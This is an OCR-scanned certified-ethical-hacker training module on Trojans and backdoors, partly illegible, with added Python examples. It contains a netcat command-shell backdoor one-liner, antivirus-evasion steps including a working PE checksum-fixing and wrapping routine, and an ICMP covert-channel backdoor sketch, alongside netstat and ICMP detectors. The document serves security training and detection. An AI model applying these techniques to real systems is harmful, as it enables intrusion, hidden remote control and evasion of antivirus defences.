CEHv8 Module 06: Trojans and Backdoors

Scanned document (OCR); the text may contain recognition errors.

Document information
  Pages: 98
  Size: 4.53 MB

Content


Page 2

PandaLabs, Panda Security's anti-malware laboratory, stated that, in the first ten months of the year, the number of threats created and distributed account for one third of all viruses that exist. This means that 34 percent of all malware ever created has appeared in the last ten months.

The company's collective intelligence database, which automatically detects, analyzes and classifies 99.4 percent of the threats received, now has 134 million separate files, 60 million of which are malware (viruses, worms, trojans and other threats).

The report further added that, up to October this year, some 20 million new strains of malware have been created (including new threats and variants of existing families), the same amount as in the whole of 2009. The average number of new threats created every day has risen from 55,000 to 63,000.

Despite these dramatic numbers, the speed with which the number of new threats is growing has dropped since 2009. Since 2003, new threats have increased at a rate of 100 percent or more. "Yet so far in 2010 the rate of growth is around 50 percent", explains Luis Corrons, technical director, PandaLabs.

The company further informed that, although more malicious software is created, its lifespan is shorter: 54 percent of malware samples are active for just 24 hours, as opposed to the lifespan of ... enjoyed by the threats of previous years. They now infect just a few systems and ... detect new malware, hackers modify them or create new ones so as to evade detection. "This is why it is so important to have protection technologies such as collective intelligence, which can rapidly neutralize new malware and reduce ..."

Sidebar quote, only partly legible in the scan: "This doesn't mean that there are fewer threats or ... is shrinking. Quite the ... expand, and by the end of 2010 we will have logged ... 2003. Yet it seems as though hackers are applying ... prioritizing the ..."

Page 3

Học viện Công Nghệ Thông Tin Bach Khoa (Bach Khoa Academy of Information Technology)

Module objectives:
  Trojan and Backdoor
  Overt and Covert Channels
  Purpose of Trojans
  Indications of a Trojan Attack
  How to Infect Systems Using a Trojan?
  Evading Anti-Virus Techniques
  How to Detect Trojans?
  Anti-Trojan Software

Page 4

Module flow: Trojan Infection | Types of Trojans | Trojan Detection | Countermeasures | Anti-Trojan Software

Page 5

A Trojan is a program in which the malicious code is contained inside apparently harmless ... (the slide cites, as an example of the damage, corrupting the file allocation table on your hard disk).

Figure (only partly legible): an attacker communicating with a "Victim in London infected with Trojan", with message bubbles "Here is my credit card number and expiry date" and "Send me Facebook account information"; a caption fragment reads "... would be able to read ... and ... and/or on the screen".

Page 6

Overt Channel: a legitimate communication path within a computer system, or network, for transfer of data. Examples of overt channels include games or any legitimate programs.

Covert Channel: a channel that transfers information within a computer system, or network, in a way that violates the security policy. The simplest form of covert channel is a Trojan. Example: Trojan.exe (a keylogger that steals passwords).

Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

Page 7

Purpose of Trojans (slide only partly legible): delete or replace the operating system's critical files; generate fake traffic to create DoS attacks.

Page 8

Information targeted by Trojans (slide only partly legible): credit card information; account data (email addresses, passwords, user names, etc.); ... other machines on the network or Internet.

Page 9

Indications of a Trojan Attack (slide only partly legible): screensaver's settings change automatically; strange purchase statements appear in the credit card bills; background settings change; ... personal information about a victim; ... button disappears; ... on victims.

Page 10

(Slide content illegible in the scan apart from the range "2330 - 2338".)

Page 11

Module flow: Trojan Infection | Types of Trojans | Trojan Detection | Countermeasures | Anti-Trojan Software | Penetration Testing

Page 12

How to Infect Systems Using a Trojan (slide only partly legible): create a dropper, which is a part in a trojanized packet that installs the malicious code on the target system.

Page 13

Page 14

Wrapper: when the user runs the wrapped EXE, it first installs the Trojan in the background and then runs the wrapping application; the two programs are wrapped together into one file. Attackers might send a ... that will install a Trojan as the user watches, for example, a birthday cake dancing across the screen.

Page 15

(Wrapper tool screenshot; illegible in the scan.)

Page 16

Ways a Trojan can get into a system (slide only partly legible):
  Downloading files, games, and screensavers from Internet sites
  Attachments
  NetBIOS (file sharing)
  Browser and email software bugs

Page 17

Figure: How to deploy a Trojan? The attacker sends an email to the victim containing a link to the Trojan server; the victim clicks the link and ...; the Trojan is sent to the victim from the Trojan server (Russia) over the Internet.

Page 18

Evading Anti-Virus Techniques (slide only partly legible):
  ... (anti-virus can detect these easily)
  ... application
  Change the content of the Trojan using a hex editor, and also change the checksum and encrypt the file
  Change the Trojan's syntax: convert an EXE to a VB script, to a DOC file, to a PPT file, to a PDF file (in practice this means disguising or embedding the executable in another file type rather than a true conversion)
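The wrapper slide (page 14) and the hex-editor/checksum item above describe two on-disk manipulations of a Windows executable: appending a second program to an innocent host, and editing bytes and then fixing the header checksum so the file still looks consistent. The Python below is an added example written for this page; it is not taken from the CEH module or from any EC-Council tool. It builds a constructed minimal PE image (not a runnable program), shows the wrapped file as host plus appended overlay, and implements the PE header CheckSum algorithm that Windows' ImageHlp uses, so that both the attacker's "fix the checksum" step and the defender's "is the checksum stale?" check can be run. The image layout constants, the payload bytes and the patch offset are assumptions for the demonstration.

```python
import struct

# Layout constants for the constructed image (assumptions, not from the slides).
E_LFANEW = 0x40          # PE header placed right after a 64-byte DOS header
OPT_HDR_SIZE = 224       # PE32 optional header
RAW_PTR, RAW_SIZE = 512, 512


def build_host_pe(section_body=b"\x90" * 64):
    """Construct a minimal, non-executable PE32 image with one section.
    Constructed test data standing in for the 'innocent' wrapped application."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, E_LFANEW)
    # COFF: machine, nsections, timestamp, symtab ptr, nsyms, optional size, characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, OPT_HDR_SIZE, 0x0102)
    opt = bytearray(OPT_HDR_SIZE)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic; CheckSum (offset 64) left at zero
    # Section header: name, vsize, vaddr, raw size, raw ptr, reloc ptr, line ptr, nreloc, nline, flags
    sect = struct.pack("<8sIIIIIIHHI", b".text\0\0\0", len(section_body), 0x1000,
                       RAW_SIZE, RAW_PTR, 0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect).ljust(RAW_PTR, b"\0")
    return headers + section_body.ljust(RAW_SIZE, b"\0")


def pe_layout(data):
    """Return (end of the last section's raw data, file offset of the CheckSum field)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsect = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    sect_table = e_lfanew + 24 + opt_size
    end = 0
    for i in range(nsect):
        raw_size, raw_ptr = struct.unpack_from("<II", data, sect_table + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return end, e_lfanew + 24 + 64   # CheckSum is at optional-header offset 64 (PE32 and PE32+)


def find_overlay(data):
    """Bytes after the last section: where simple wrappers and droppers append their payload."""
    end, _ = pe_layout(data)
    return data[end:]


def wrap(host, payload):
    """On-disk shape of a wrapped executable: payload appended as an overlay.
    (A real wrapper also adds a stub that extracts and runs the overlay.)"""
    return host + payload


def hex_patch(data, offset, new_bytes):
    """What the attacker does with a hex editor: overwrite bytes in place."""
    return data[:offset] + new_bytes + data[offset + len(new_bytes):]


def pe_checksum(data):
    """PE header CheckSum as ImageHlp computes it: ones'-complement sum of 32-bit words
    (skipping the CheckSum field itself), folded to 16 bits, plus the file size."""
    _, cs_off = pe_layout(data)
    total, top = 0, 1 << 32
    for i in range(0, len(data) - len(data) % 4, 4):
        if i == cs_off:
            continue
        total += struct.unpack_from("<I", data, i)[0]
        if total >= top:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    if len(data) % 4:   # a trailing partial word is zero-padded
        tail = data[len(data) - len(data) % 4:].ljust(4, b"\0")
        total += struct.unpack("<I", tail)[0]
        if total >= top:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return ((total & 0xFFFF) + len(data)) & 0xFFFFFFFF


def set_checksum(data):
    """The slide's 'also change the checksum' step: write a fresh CheckSum into the header."""
    _, cs_off = pe_layout(data)
    return hex_patch(data, cs_off, struct.pack("<I", pe_checksum(data)))


def verify_checksum(data):
    """Defender's check: does the stored CheckSum still match the file contents?"""
    _, cs_off = pe_layout(data)
    stored = struct.unpack_from("<I", data, cs_off)[0]
    return stored == pe_checksum(data)
```

From the defender's side, find_overlay() is the check to run on a suspect binary: legitimate installers do carry overlays, but an overlay that itself starts with MZ, as in the constructed payload, is a second executable riding inside the first. A non-matching CheckSum is a weak signal on its own, since many compilers leave the field at zero, but a non-zero value that no longer matches is exactly the artefact a hex-edited binary leaves behind unless the attacker performs the recomputation step the slide recommends.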

Page 19

Module flow: Trojan Infection | Types of Trojans | Trojan Detection | Countermeasures | Anti-Trojan Software | Penetration Testing

Page 20

Page 21

Command Shell Trojans

The Trojan server is installed on the victim's machine, where it opens a port for the attacker to connect. The client is installed on the attacker's machine and is used to launch a command shell on the victim's machine.

Page 22

Netcat help text (the classic command-shell backdoor: nc -l -p <port> -e cmd.exe on the victim, nc <victim> <port> from the attacker):

  listen for inbound:  nc -l -p port [options] [hostname] [port]
  options:
    -e prog      inbound program to exec [dangerous!!]
    -g gateway   source-routing hop point[s], up to 8
    -G num       source-routing pointer: 4, 8, 12, ...
    -h           this cruft
    -i secs      delay interval for lines sent, ports scanned
    -l           listen mode, for inbound connects
    -L           listen harder, re-listen on socket close
    -n           numeric-only IP addresses, no DNS
    -o file      hex dump of traffic
    -p port      local port number
    -r           randomize local and remote ports
    -s addr      local source address
    -t           answer TELNET negotiation
    -u           UDP mode
    -v           verbose [use twice to be more verbose]
    -w secs      timeout for connects and final net reads
    -z           zero-I/O mode [used for scanning]
  port numbers can be individual or ranges: m-n [inclusive]
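A command-shell Trojan such as the netcat listener above has to hold a listening socket open on the victim, and the botnet Trojans later in this module keep an established connection to their IRC command-and-control server. Both are visible in `netstat -ano` on the victim, which is the detection step the module's "How to Detect Trojans?" objective refers to. The Python below is an added example, not part of the CEH module: it parses constructed `netstat -ano` output, joins it with a constructed PID-to-image map (on a real Windows host you would take that from `tasklist /FO CSV`), and reports listeners that are missing from a per-host baseline as well as established connections from any process to an external host on an IRC port. The sample rows, process names, baseline and addresses are all made up for the demonstration; `svchosts.exe` is a deliberately misspelled lookalike of the real service host.

```python
import ipaddress
import re

# Constructed sample of `netstat -ano` output on a Windows host (not a real capture).
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       3120
  TCP    192.168.1.10:49712     203.0.113.7:6667       ESTABLISHED     3120
  TCP    192.168.1.10:49801     198.51.100.20:443      ESTABLISHED     2204
  UDP    0.0.0.0:5353           *:*                                    1544
"""

# Constructed PID -> image name map (on a real host: `tasklist /FO CSV`).
PROCESS_OF = {884: "svchost.exe", 4: "System", 3120: "svchosts.exe",
              2204: "chrome.exe", 1544: "mDNSResponder.exe"}

# Assumed per-host baseline of (port, image) pairs that are allowed to listen.
BASELINE_LISTENERS = {(135, "svchost.exe"), (445, "System"), (5353, "mDNSResponder.exe")}

IRC_PORTS = {6665, 6666, 6667, 6668, 6669, 6697}

INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "0.0.0.0/8")]

# Proto, local, foreign, optional state (UDP rows have none), PID.
ROW_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")


def split_endpoint(endpoint):
    """'192.168.1.10:49712' -> ('192.168.1.10', 49712); '*:*' -> ('*', None)."""
    host, _, port = endpoint.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text):
    """Turn netstat -ano rows into dicts; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        proto, local, foreign, state, pid = m.groups()
        lhost, lport = split_endpoint(local)
        fhost, fport = split_endpoint(foreign)
        rows.append({"proto": proto, "lhost": lhost, "lport": lport,
                     "fhost": fhost, "fport": fport,
                     "state": state or "", "pid": int(pid)})
    return rows


def is_external(host):
    """True for routable addresses outside RFC 1918, loopback and the 'this' network."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:          # '*' or a bracketed IPv6 literal: not judged here
        return False
    return not any(ip in net for net in INTERNAL_NETS)


def find_suspicious(rows, process_of, baseline):
    """Return (pid, image, reason) for unexpected listeners and outbound IRC sessions."""
    findings = []
    for r in rows:
        image = process_of.get(r["pid"], "<unknown>")
        listening = r["state"] == "LISTENING" or (r["proto"] == "UDP" and r["fhost"] == "*")
        if listening and (r["lport"], image) not in baseline:
            findings.append((r["pid"], image,
                             "unexpected listener on %s/%d" % (r["proto"], r["lport"])))
        if r["state"] == "ESTABLISHED" and is_external(r["fhost"]) and r["fport"] in IRC_PORTS:
            findings.append((r["pid"], image,
                             "outbound IRC to %s:%d" % (r["fhost"], r["fport"])))
    return findings


if __name__ == "__main__":
    rows = parse_netstat(NETSTAT_SAMPLE)
    for pid, image, reason in find_suspicious(rows, PROCESS_OF, BASELINE_LISTENERS):
        print("PID %-5d %-20s %s" % (pid, image, reason))
```

The baseline is the part that needs care in practice: it has to be captured from a known-clean build of the same host role, and a listener is judged by the (port, image) pair, not the port alone, because a Trojan that squats on a "normal" port under a lookalike process name is exactly the case the port-only view misses.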

Page 25

Figure: a phishing e-mail used to deliver the Trojan. The message reads: "We have received a package addressed to you at the value of USD 2,350. The custom duty has not been paid for this shipment which is listed as ... Please call us at Fedex at 1800-234-446 Ext 345 or e-mail me at m.roberts@fedex.com regarding this shipment. Please visit our Fedex Package Tracking Website to see more details about this shipment and advise us on how to proceed. The website link is attached with this letter. Customer Service Representative, International Shipment and Handling, Fedex ... Division, Tel 1800-234-446 Ext 345." Annotations: the attacker embeds the Trojan into a Word document and infects the victim; the Trojan is executed as the victim opens the document and clicks on the Trojan package (Victim's System).

Page 26

E-mail Trojans: the attacker uses an open-relay SMTP server and fakes the email's FROM field to hide the origin. (Diagram: attacker, Internet, firewall.)

Page 27

Page 28

(Tool description, only partly legible:) ... lets you view, edit, extract, and replace strings, bitmaps, logos and icons from any Windows program.

Page 30

Botnet Trojans

Botnet Trojans infect a large number of computers across a large geographical area ... controlled through a Command and Control (C&C) center ... attacks, spamming, click fraud, and the theft of financial information. (Diagram: a Botnet C&C server with several Bots.)

Page 31

(Screenshot of a botnet Trojan builder, only partly legible: options "Install Kernel Driver", "Save services state in registry", "Colored IRC messages"; IRC settings showing port 6667, a channel name and a password; build path C:\Documents and Settings\Administrator\Desktop\MIS VIRUS\BOTNET\Illusion_ ... )

Page 32

Botnet Trojan: NetBot Attacker (English version)

(Screenshot of the NetBot Attacker console, only partly legible: tabs for online hosts and attack; a table of connected bots listing IP address, hostname, Windows version, memory and a 2007-03-13 timestamp.)

Page 33

Proxy Server Trojans

Trojan Proxy is usually a standalone application that allows remote attackers to use the victim's computer as a proxy ... Thousands of machines on the Internet are infected with proxy servers using this technique.

Page 34

Proxy Server Trojan: W3bPr0xy Tr0j4nCr34t0r (Funny Name)

W3bPr0xy Tr0j4n is a proxy server Trojan which supports multiple connections from many clients and reports the IP and ports to the mail of the Trojan owner.

Page 35

FTP Trojans

... an attacker can connect to the victim's machine over the FTP port and download any files that exist on the victim's computer. (Screenshot, only partly legible: a directory listing of the victim's drive that includes a c:\creditcard.txt file, with the note "FTP server installed in ...".)

Page 36

FTP server Trojan status (screenshot):
  ControlPort: 21
  BindPort: 55555
  UserName: test
  Password: test
  HomeDir: c:\win98
  Allowed IP: all
  Local Address: 192.168.168.116
  ReadAccess: Yes
  WriteAccess: Yes
  ListAccess: Yes
  CreateAccess: Yes
  DeleteAccess: Yes
  ExecuteAccess: Yes
  UnlockAccess: No
  AnonymousAccess: No
  Check Time Out Thread Created Successfully
  0 Connection Is In Use

Page 37

Since the VNC program is considered a legitimate utility, this Trojan is frequently not flagged by antivirus software; what betrays it is the installation context (an unexpected VNC service and its listening port) rather than a file signature.

Page 38

Page 39

Page 40

(Slide only partly legible: "... with the location of an IP address".)

Page 41

(Slide only partly legible: "... infect the victim's computer with ..." and "... should be running in the background listening on ...".)

Page 42

Page 43

ICMP Backdoor: commands are sent using the ICMP protocol.
  icmpsrv -install   (to install the service)
  icmpsrv -remove    (to remove the service)
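The overt/covert channel slide (page 6) and the ICMP backdoor above describe the same idea from two ends: the attacker hides commands inside a protocol the firewall already allows, and the defender can only catch it by looking at what the allowed protocol carries. The Python below is an added example written for this page; it is not the icmpsrv tool and not EC-Council code. It implements the ICMP echo format and checksum, a hypothetical backdoor that tags commands with an assumed two-byte marker inside echo-request payloads, and a detector that flags echo requests whose payload matches neither the Windows ping.exe payload nor the timestamp-plus-counter pattern of iputils ping. All packets are constructed in memory; nothing is sent on the network.

```python
import struct


def inet_checksum(data):
    """RFC 1071 ones'-complement checksum over 16-bit big-endian words (odd length zero-padded)."""
    if len(data) % 2:
        data += b"\0"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(payload, icmp_type=8, ident=0x1234, seq=1):
    """ICMP echo request (type 8) or reply (type 0) carrying the given payload."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_icmp(packet):
    """Validate the checksum and split an ICMP message into header fields and payload."""
    if len(packet) < 8:
        raise ValueError("truncated ICMP message")
    if inet_checksum(packet) != 0:          # a correct message sums to zero
        raise ValueError("bad ICMP checksum")
    icmp_type, code, _, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return {"type": icmp_type, "code": code, "id": ident, "seq": seq, "payload": packet[8:]}


# --- the backdoor's side: a command hidden in the echo payload -------------------
TAG = b"\xCA\xFE"   # assumed marker the hypothetical backdoor uses to recognise its own traffic


def backdoor_send(command, seq):
    """Attacker side: wrap a command in what looks like an ordinary ping."""
    return build_echo(TAG + command.encode(), icmp_type=8, seq=seq)


def backdoor_receive(packet):
    """Victim side (the icmpsrv role): return the command, or None for a real ping."""
    p = parse_icmp(packet)
    if p["type"] == 8 and p["payload"].startswith(TAG):
        return p["payload"][len(TAG):].decode()
    return None


# --- the defender's side: does the payload look like a normal ping? ---------------
WINDOWS_PING = b"abcdefghijklmnopqrstuvwabcdefghi"   # ping.exe default 32-byte payload


def looks_like_normal_ping(payload):
    if payload == WINDOWS_PING:
        return True
    # iputils ping: 8-byte timestamp, then bytes that increase by one (the start value
    # differs between versions, so only the increment is checked).
    rest = payload[8:]
    if len(rest) >= 8 and all(rest[i] == (rest[0] + i) & 0xFF for i in range(len(rest))):
        return True
    return False


def flag_covert_echoes(packets):
    """Return (seq, payload) for echo requests whose payload matches no known ping tool."""
    hits = []
    for pkt in packets:
        p = parse_icmp(pkt)
        if p["type"] == 8 and not looks_like_normal_ping(p["payload"]):
            hits.append((p["seq"], p["payload"]))
    return hits


# Constructed traffic: one Windows ping, one Linux-style ping, one hidden command.
SAMPLE_PACKETS = [
    build_echo(WINDOWS_PING, seq=1),
    build_echo(b"\0" * 8 + bytes(range(0x10, 0x40)), seq=2),
    backdoor_send("dir c:\\", seq=3),
]
```

The detector is deliberately an allowlist, not a signature for this one backdoor: a tool like icmpsrv can change its marker at will, but it cannot make an arbitrary command look like the fixed payload a real ping client emits, so "echo request with an unfamiliar payload" is the durable indicator, and the same reasoning applies to any other covert channel riding on an allowed protocol.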

Page 44

Remote Access Trojans: this Trojan works like remote desktop access; the hacker gains complete GUI access to the remote system.

Page 46

Page 47

Covert Channel Trojan: CCTT

1. ... access control system.
2. It enables attackers to get an external shell from within the internal network and vice versa.
3. It sets up a TCP/UDP/HTTP CONNECT|POST channel allowing TCP data streams (SSH, SMTP, POP, etc.) between an external server and a box within the internal network.

(Diagram: encoded data through TCP/UDP; Client, CCTT, Firewall, Target Services.)

Page 48

E-banking Trojans

E-banking Trojans intercept a victim's account information before it is encrypted and send it to the attacker's Trojan command and control center. (Diagram: malicious advertisements published among legitimate websites; the user accesses the infected site; a Control and Command Server.)

Posted: 14/12/2021, 18:37